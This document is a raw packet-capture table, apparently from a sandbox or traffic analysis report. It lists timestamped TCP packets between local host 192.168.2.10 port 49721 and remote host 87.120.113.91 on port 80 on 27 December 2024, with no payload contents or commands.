                                                        Dec 27, 2024 14:53:44.595355988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.595396996 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.595448971 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.596224070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.596257925 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.596272945 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.596955061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.596988916 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.597069979 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.597783089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.597817898 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.598017931 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.598639011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.598674059 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.598716974 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.599477053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.599517107 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.599562883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.600255966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.600291967 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.600378990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.601217031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.601249933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.601316929 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.601933002 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.601979971 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.645694017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.645755053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.645797968 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.646051884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.646122932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.646153927 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.646672010 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.646745920 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.646779060 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.647502899 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.647644997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.647680044 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.648374081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.648497105 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.648530960 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.649208069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.649290085 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.649336100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.649944067 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.650033951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.650064945 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.650712967 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.650726080 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.650765896 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.651501894 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.651640892 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.651674986 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.652266026 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.652384043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.652424097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.653091908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.653192997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.653228045 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.653999090 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.654113054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.654144049 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.654922962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.655033112 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.655092001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.655623913 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.655874014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.655905962 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.656393051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.656485081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.656516075 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.657289982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.657393932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.657457113 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.658058882 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.658133030 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.658169985 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.658809900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.658912897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.658943892 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.659646034 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.659811020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.659845114 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.660499096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.660545111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.660576105 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.661346912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.661477089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.661514997 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.662072897 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.662215948 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.662283897 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.662940025 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.663029909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.663058043 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.663744926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.663866043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.663906097 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.766751051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.766812086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.766861916 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.766961098 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.767040014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.767075062 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.767628908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.767694950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.767728090 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.768389940 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.768536091 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.768568993 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.782116890 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.782129049 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.782215118 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.782309055 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.782417059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.782454014 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.783236027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.783255100 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.783289909 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.783977032 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.784097910 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.784133911 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.784849882 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.784996986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.785031080 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.785693884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.785726070 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.785764933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.786391973 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.786613941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.786684036 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.787230015 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.787333012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.787369013 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.788057089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.788162947 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.788198948 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.788875103 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.788963079 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.789000988 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.789727926 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.789792061 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.789834023 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.790523052 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.790637016 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.790673971 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.791357040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.791439056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.791477919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.792177916 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.792279005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.792427063 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.792969942 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.793073893 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.793103933 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.793785095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.793910980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.793947935 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.794590950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.794691086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.794725895 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.795428038 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.795559883 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.795602083 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.796267986 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.796380043 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.796418905 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.797059059 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.797192097 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.797236919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.798007011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.798099041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.798142910 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.798721075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.798837900 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.798877001 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.799587011 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.799751997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.800101995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.800309896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.800462961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.800498962 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.801161051 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.801278114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.801320076 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.802021980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.802087069 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.802122116 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.802812099 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.802922964 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.802958965 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.847182989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.847342014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.847397089 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.847619057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.847820997 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.847889900 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.848443031 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.848623991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.848664999 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.849244118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.849299908 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.849334002 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.850090027 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.850210905 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.850249052 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.850939989 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.850986004 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.851023912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.851666927 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.851804018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.851845980 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.852513075 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.852621078 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.852655888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.853303909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.853480101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.853521109 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.854239941 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.854253054 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.854300976 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.855053902 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.855067968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.855107069 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.855787992 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.855880976 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.855911970 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.856599092 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.856791019 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.856826067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.857414007 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.857512951 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.857546091 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.858237982 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.858375072 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.858408928 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.859059095 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.859168053 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.859201908 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.859869957 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.859999895 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.860038042 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.860714912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.860790014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.860829115 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.861486912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.861658096 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.861697912 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.862370968 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.862425089 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.862462997 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.863126040 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.863248110 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.863282919 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.863948107 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.864064932 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.864104033 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.864815950 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.864912033 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.864944935 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.865566969 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.912563086 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.968060017 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.968075991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.968142033 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.968426943 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.968590975 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.968630075 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.969248056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.969363928 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.970160961 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.970185995 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.983489037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.983504057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.983527899 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.983982086 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.984002113 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.984020948 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.984237909 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.984267950 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.984782934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.984899044 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.984941006 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.985593081 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.985726118 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.985766888 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.986453056 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.986562014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.986602068 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.987246990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.987360001 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.987642050 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.988075018 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.988195896 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.988230944 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.988924980 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.989124060 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.989161015 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.989748955 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.990103006 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.990137100 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.990714073 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.990788937 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.990824938 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.991353035 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.991533041 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.991565943 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.992197037 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.992350101 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.992383003 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.993017912 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.993093014 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.993124962 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.993890047 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.994107008 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.994143009 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.994740009 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.994752884 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.994796991 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.995532990 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.995587111 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.995620966 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.996315956 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.996433020 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.996473074 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.997076988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.997200966 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.997240067 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.997935057 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.998019934 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.998054028 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.998780012 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.999046087 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.999079943 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:44.999655962 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.999691963 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:44.999728918 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.000355005 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.000448942 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.000485897 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.001219988 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.001368046 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.001401901 CET4972180192.168.2.1087.120.113.91
                                                        Dec 27, 2024 14:53:45.002015114 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.002099991 CET804972187.120.113.91192.168.2.10
                                                        Dec 27, 2024 14:53:45.002135992 CET4972180192.168.2.1087.120.113.91
